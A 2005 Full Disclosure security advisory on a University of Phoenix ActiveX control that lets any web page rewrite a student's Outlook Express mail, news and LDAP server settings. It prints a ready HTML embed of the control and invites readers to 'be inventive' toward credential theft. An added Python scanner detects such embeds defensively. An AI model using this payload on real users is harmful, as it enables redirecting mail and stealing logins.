Full Disclosure mailing list archives

University of Phoenix - Outlook Express Unauthorized Configuration Manipulation


From: Adam Baldwin <evilpacket () gmail com>
Date: Mon, 31 Jan 2005 21:04:26 -0800

 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

University of Phoenix Outlook Express Unauthorized Configuration Manipulation
Vendor Homepage: http://www.phoenix.edu

Discovered by: Adam Baldwin (evilpacket () ngenuity-is com)
www.evilpacket.net\advisories\EP-000-0002.html

Discovery Date: 1.17.2005

File Name: PhxStudent15.ocx
Vulnerable Version: 2.00.0001

Overview:
PhxStudent15.ocx is an ActiveX control used to set up e-mail / NNTP and
LDAP accounts in Outlook Express. This control remains on the user's
system long after the setup process has completed. This ActiveX
control can be used to manipulate the user's account settings (imap /
smtp / nntp / ldap).

The following is an example of how to embed this control into a
website with the proper params. Note the account is only 'modified'
if the "Program" param remains the same, which is not difficult. Any
of the other settings can be modified to cause any number of attacks
from denial of service to theft of login credentials (be inventive
:-)

Example:
<HTML>
<BODY>
<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4
codeBase="PhxStudent15.ocx">
     <PARAM NAME="Program" VALUE="BSIT">
     <PARAM NAME="GroupID" VALUE="BSAF008HU0">
     <PARAM NAME="CourseID" VALUE="DBM/380">
     <PARAM NAME="StartDate" VALUE="01/20/2005">
     <PARAM NAME="Path" VALUE="">
     <PARAM NAME="DNS" VALUE="bsit2.phoenix.edu">
     <PARAM NAME="Student" VALUE="Y">
     <PARAM NAME="FName" VALUE="FIRSTNAME">
     <PARAM NAME="LName" VALUE="LASTNAME">
     <PARAM NAME="Alias" VALUE="username">
     <PARAM NAME="ErrorPath" VALUE="">
     <PARAM NAME="CourseListPage" VALUE="">
     <PARAM NAME="Account2000YN" VALUE="Y">
     <PARAM NAME="NNTPUserNamePrefix" VALUE="ols\">
     <PARAM NAME="EmailSuffix" VALUE="@email.uophx.edu">
     <PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">
     <PARAM NAME="MailoutLocation" VALUE="emailout.phoenix.edu">
     <PARAM NAME="EmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="FlexnetEmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="LDAPUserName" VALUE="">
     <PARAM NAME="ProgramSuffix" VALUE="_">
</OBJECT>
</BODY>
</HTML>

Mitigation:
The University of Phoenix has been contacted but no response has been
received. I would recommend that students remove this ActiveX control
and only allow it to be installed while registering for classes.

Notes:
At this time further exploitation does not appear possible, although
on the following platform (with modification of the params) would
crash IE after the ocx was loaded and crashed 3 times in the same
browser window, which begs further research.

Platform: Windows XP SP2, IE 6.0.2900.2180.xpsp2_rtm.040803-2158 

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
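
Added example (not part of the original advisory and not the vendor's code): a Python scanner that a proxy or content filter could run over HTML to spot pages that instantiate the control by the CLSID shown in the advisory, and to flag server PARAMs that point outside the university's domains. The trusted-domain list is an assumption drawn from the hostnames in the advisory's example, and `SAMPLE` is constructed.

```python
from html.parser import HTMLParser

# CLSID of PhxStudent15.ocx, taken from the advisory's example page.
PHX_CLSID = "a82c3a33-5c0e-466c-b020-71585433a7e4"
# PARAMs that carry server names written into the mail/news/LDAP accounts.
SERVER_PARAMS = {"dns", "ldapserver", "mailoutlocation", "emaillocation",
                 "flexnetemaillocation"}
# Assumption: legitimate servers sit under the domains seen in the advisory.
TRUSTED_SUFFIXES = ("phoenix.edu", "uophx.edu")

def is_trusted(host):
    host = host.strip().lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)

class PhxControlScanner(HTMLParser):
    """Collects the PARAMs of every OBJECT tag that loads the control."""
    def __init__(self):
        super().__init__()
        self.embeds = []      # one dict of PARAMs per matching OBJECT
        self._current = None  # PARAM dict of the OBJECT being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").strip().lower()
            if clsid.startswith("clsid:"):
                clsid = clsid[len("clsid:"):]
            self._current = {} if clsid == PHX_CLSID else None
            if self._current is not None:
                self.embeds.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def scan(html):
    """Return (embed_count, [(param, value)] for untrusted server values)."""
    scanner = PhxControlScanner()
    scanner.feed(html)
    scanner.close()
    findings = [(n, v) for params in scanner.embeds
                for n, v in sorted(params.items())
                if n in SERVER_PARAMS and v and not is_trusted(v)]
    return len(scanner.embeds), findings

# Constructed sample: the control embedded with one rewritten mail server.
SAMPLE = ('<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4>'
          '<PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">'
          '<PARAM NAME="EmailLocation" VALUE="mail.example.net"></OBJECT>')
```

A non-zero embed count on any page not served by the university is worth an alert on its own; the findings list narrows that to the settings that would redirect mail, news or directory traffic.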

